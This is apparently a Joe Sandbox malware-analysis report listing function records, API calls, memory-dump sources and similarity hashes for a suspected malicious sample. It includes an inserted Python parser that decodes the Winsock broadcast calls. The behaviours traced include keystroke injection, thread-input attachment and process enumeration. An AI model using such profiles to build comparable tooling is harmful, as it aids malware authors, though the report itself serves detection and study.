                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
                                                                                                            • Instruction ID: ecae26ce0acef3140cd72bfcd16e28b070e03a00f02ba021a00bbf178c6940cf
                                                                                                            • Opcode Fuzzy Hash: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
                                                                                                            • Instruction Fuzzy Hash: FFC12D75A00216EFDB14DF98C898EAEBBB5FF48704F148598E506EB251D731ED41CBA0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 1998397398-0
                                                                                                            • Opcode ID: b8d11b5021b2a138739462bb94e3a0880f88ff4d837601d988d8abe958d47244
                                                                                                            • Instruction ID: c53bbe74741b12f39c5e40ebc831c8367ab9eb6ae8f743f6ee25bb12deb86941
                                                                                                            • Opcode Fuzzy Hash: b8d11b5021b2a138739462bb94e3a0880f88ff4d837601d988d8abe958d47244
                                                                                                            • Instruction Fuzzy Hash: 99A1E6756047009FCB10DF28D585A2AB7E5EF88715F14885AFD8A9B362DB30ED05CBB2
                                                                                                            APIs
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB05F0
                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB0608
                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00DECC40,000000FF,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB062D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00DB064E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 314563124-0
                                                                                                            • Opcode ID: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
                                                                                                            • Instruction ID: 8b8ec4c68efc53ea624c569c4f35d2f1248decee570ee865975156408780bf20
                                                                                                            • Opcode Fuzzy Hash: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
                                                                                                            • Instruction Fuzzy Hash: 8E810D75A00109EFCB04DF98C984EEEBBB9FF89315F244558E516EB250DB71AE06CB60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 97bc704b6d8ea5213be7bf69c32b1d26d9c22e6c35832688fe2f25e119fae065
                                                                                                            • Instruction ID: 2ac82759ac0d1a29c84e26124ec41f6bfe2b58e30fbb6bd4ece320224c29ccd7
                                                                                                            • Opcode Fuzzy Hash: 97bc704b6d8ea5213be7bf69c32b1d26d9c22e6c35832688fe2f25e119fae065
                                                                                                            • Instruction Fuzzy Hash: BD413B39A00212ABDF317BFD9C45ABE3AF5EF49370F294225F419D6292F63488419772
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(013EE730,?), ref: 00DE62E2
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE6315
                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DE6382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3880355969-0
                                                                                                            • Opcode ID: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
                                                                                                            • Instruction ID: 95018283d60788beae307a17646ff8a15a7bcdce2e7c56b0f841a8a7e22e8c8d
                                                                                                            • Opcode Fuzzy Hash: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
                                                                                                            • Instruction Fuzzy Hash: EB512F74900245EFDF10EF69D8819AE7BB6FFA53A0F188159F9159B2A0D730ED81CB60
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00DD1AFD
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1B0B
                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DD1B8A
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1B94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$socket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1881357543-0
                                                                                                            • Opcode ID: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
                                                                                                            • Instruction ID: 4743d37154b7a880daefe08b2217064f24b63855851c348b5504eb528040054f
                                                                                                            • Opcode Fuzzy Hash: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
                                                                                                            • Instruction Fuzzy Hash: FD417338640200AFEB20AF24C886F2A77E5EB45718F548459F9559F3D2D772ED41CBB0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
                                                                                                            • Instruction ID: 846379266b360966668dfb120279d8eeaeebe03b436b0d43956a2a660317e1dd
                                                                                                            • Opcode Fuzzy Hash: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
                                                                                                            • Instruction Fuzzy Hash: 75411775A00704BFD724AF3CCC42B6ABBE9EB88724F10856BF546DB292D771990187B0
                                                                                                            APIs
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DC5783
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00DC57A9
                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DC57CE
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DC57FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3321077145-0
                                                                                                            • Opcode ID: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
                                                                                                            • Instruction ID: 2110f62ce8ea40ff2641befd8d3e1015045ef3e256df8d6872d0f50267560ce3
                                                                                                            • Opcode Fuzzy Hash: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
                                                                                                            • Instruction Fuzzy Hash: FB411C35600611DFCF11EF15D444A5ABBE1EF89321B198488EC4A9B362DB30FD45CBB1
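The function records above (the UDP socket function with the `#21.WSOCK32` ordinal call, and the CreateHardLinkW / GetLastError / DeleteFileW / CreateHardLinkW retry sequence) all follow the same fixed layout: an `APIs` list of `name.MODULE(args), ref: address` lines (optionally nested under `Part of subcall function`), a `Memory Dump Source` block, and a `Similarity` block that ends with `Instruction Fuzzy Hash`. The following is an added example, not Joe Sandbox code, that parses that layout into structured records and then names the constants in the Winsock calls: ordinal 21 of wsock32.dll/ws2_32.dll is `setsockopt` (the Winsock export table is alphabetical), `socket(2, 2, 0x11)` is `AF_INET, SOCK_DGRAM, IPPROTO_UDP`, and `setsockopt(s, 0xFFFF, 0x20, ...)` is `SOL_SOCKET, SO_BROADCAST`, i.e. a UDP socket set up for broadcast. `SAMPLE` is copied from those two records on this page with the repeated `Associated`, `Snapshot File` and ID lines dropped; the constant tables are standard Winsock values and are the example's own assumption about how far decoding should go.

```python
"""Parser for Joe Sandbox IDA-plugin function records, plus a decoder for the Winsock calls in
the UDP record. Added example, not Joe Sandbox code; SAMPLE is two records copied from this page."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00DD1AFD
• WSAGetLastError.WSOCK32 ref: 00DD1B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DD1B8A
• WSAGetLastError.WSOCK32 ref: 00DD1B94
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode Fuzzy Hash: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
• Instruction Fuzzy Hash: FD417338640200AFEB20AF24C886F2A77E5EB45718F548459F9559F3D2D772ED41CBB0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DC5783
• GetLastError.KERNEL32(?,00000000), ref: 00DC57A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DC57CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DC57FA
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• Instruction Fuzzy Hash: FB411C35600611DFCF11EF15D444A5ABBE1EF89321B198488EC4A9B362DB30FD45CBB1
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# name.MODULE(args), ref: ADDR   (parentheses and the comma are absent on no-argument calls)
API_RE = re.compile(r"^(?P<name>[^.\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*(?P<call>.*)$")

@dataclass
class Call:
    name: str              # API name, or '#N' for an import by ordinal
    module: str
    args: list             # raw hex strings as traced; '?' means the tracer could not resolve it
    ref: str               # call-site address in the dump
    subcall_of: str = ""   # set for lines nested under 'Part of subcall function'

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    image_base: str = ""   # 'Offset:' of the Source File line
    similarity: dict = field(default_factory=dict)

def parse_call(text, subcall_of=""):
    m = API_RE.match(text)
    if not m: return None
    args = [a for a in (m["args"] or "").split(",") if a]
    return Call(m["name"], m["module"], args, m["ref"].upper(), subcall_of)

def parse_records(text):
    """Split report text into FuncRecords; 'Instruction Fuzzy Hash' is the last line of each."""
    records, rec, section = [], FuncRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            call = parse_call(sub["call"], sub["func"]) if sub else parse_call(body)
            if call:
                rec.calls.append(call)
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", body)
            rec.image_base = off.group(1).upper() if off else ""
        elif section == "Similarity":
            key, _, val = body.partition(":")
            rec.similarity[key.strip()] = val.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                records.append(rec)
                rec = FuncRecord()
    return records

# wsock32/ws2_32 export the original API by ordinal in alphabetical order: #21 is setsockopt.
ORDINALS = {"#21": "setsockopt", "#23": "socket"}
AF, STYPE, PROTO = {2: "AF_INET"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}, {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOCKOPT = {(0xFFFF, 0x0004): "SOL_SOCKET/SO_REUSEADDR", (0xFFFF, 0x0020): "SOL_SOCKET/SO_BROADCAST"}

def decode_winsock(rec):
    """Resolve ordinal imports and name the socket()/setsockopt() constants for Winsock calls."""
    out = []
    for c in (x for x in rec.calls if x.module in ("WSOCK32", "WS2_32")):
        name = ORDINALS.get(c.name, c.name)
        v = [None if a == "?" else int(a, 16) for a in c.args]
        if name == "socket" and len(v) == 3:
            out.append(f"socket({AF.get(v[0], v[0])}, {STYPE.get(v[1], v[1])}, {PROTO.get(v[2], v[2])})")
        elif name == "setsockopt" and len(v) >= 3:
            out.append(f"setsockopt(s, {SOCKOPT.get((v[1], v[2]), (v[1], v[2]))}, ...)")
        else:
            out.append(name + "()")
    return out
```

Run over the whole report text the same parser yields one record per function, so the API-name sequences (for instance the two `CreateHardLinkW` calls around a `DeleteFileW`, which is a create-then-replace retry) and the fuzzy hashes can be compared across samples without reading the records by hand.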
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D76D71,00000000,00000000,00D782D9,?,00D782D9,?,00000001,00D76D71,8BE85006,00000001,00D782D9,00D782D9), ref: 00D8D910
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8D999
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D8D9AB
• __freea.LIBCMT ref: 00D8D9B4
  • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
• Instruction ID: ec133f78264df2d13a1a23f63ced8135741806c4fe34ea8ad0ca625edd68d1e8
• Opcode Fuzzy Hash: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
• Instruction Fuzzy Hash: 7C31B272A0021AABDF25AF65DC41EAE7BA6EB40710F194168FC08D72D0E735CD55CBB0
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00DE5352
• GetWindowLongW.USER32(?,000000F0), ref: 00DE5375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE5382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE53A8
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
• API String ID: 3340791633-0
• Opcode ID: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
• Instruction ID: d7a5a5a7aefb65107c3c6bfd56040daad9266f7cbc9b750d3f67b09a28c831d5
• Opcode Fuzzy Hash: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
• Instruction Fuzzy Hash: 2C313534A55A88EFEB30BF16EC45BE83762AB043D4F5C0001FA40962E5C3B0AD809B71
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DBABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00DBAC0D
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00DBAC74
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DBACC6
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
• Instruction ID: a44bd98308a7f443a0050c29feeffda3be22c0f5b845c573b0cbb3b85c92a306
• Opcode Fuzzy Hash: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
• Instruction Fuzzy Hash: 25312634A00358EFEF35CB6C8C457FE7FA5AB89310F08421AE486962D1D374C98187B2
APIs
• ClientToScreen.USER32(?,?), ref: 00DE769A
• GetWindowRect.USER32(?,?), ref: 00DE7710
• PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720
• MessageBeep.USER32(00000000), ref: 00DE778C
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
• Instruction ID: ecc4cd2ba1c36a82262fd58c9e5185a380c9d88dc8d075e0b7a3b081a90d3566
• Opcode Fuzzy Hash: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
• Instruction Fuzzy Hash: 3E41AD34609294DFDB51FF5AC894EA977F4FB49304F1940A8E854DB261C330E986CFA0
APIs
• GetForegroundWindow.USER32 ref: 00DE16EB
  • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
  • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
  • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
• GetCaretPos.USER32(?), ref: 00DE16FF
• ClientToScreen.USER32(00000000,?), ref: 00DE174C
• GetForegroundWindow.USER32 ref: 00DE1752
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
• Instruction ID: 4369313cfad96c9b906bc6a11adc7255094ab42125da23db16e13de7273c681d
• Opcode Fuzzy Hash: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
• Instruction Fuzzy Hash: 43311075E10249AFDB04EFAAC881DAEB7F9EF48304B548069E815E7251D631DE45CBB0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
• Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
• Process32NextW.KERNEL32(00000000,?), ref: 00DBD52F
• CloseHandle.KERNEL32(00000000), ref: 00DBD5DC
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 52718ead7edfe942f24b3630ab3ea5f33cbe59c44cdee0cc51f2dc5e68f0306a
• Instruction ID: 2272ce42b2ec7a809af902dc8394062167ca3df62afe14f71ee7bfa2ffdb5e3c
• Opcode Fuzzy Hash: 52718ead7edfe942f24b3630ab3ea5f33cbe59c44cdee0cc51f2dc5e68f0306a
• Instruction Fuzzy Hash: 1F31AF71008340DFD710EF54C891AAFBBE8EF99344F54092DF982871A2EB719949CBB2
APIs
  • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
• GetCursorPos.USER32(?), ref: 00DE9001
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DA7711,?,?,?,?,?), ref: 00DE9016
• GetCursorPos.USER32(?), ref: 00DE905E
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DA7711,?,?,?), ref: 00DE9094
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
• Instruction ID: 2f2b8bcca9e2b678c698ed041fcb53e093137f115d21c1d249e1f8a4c7d11d30
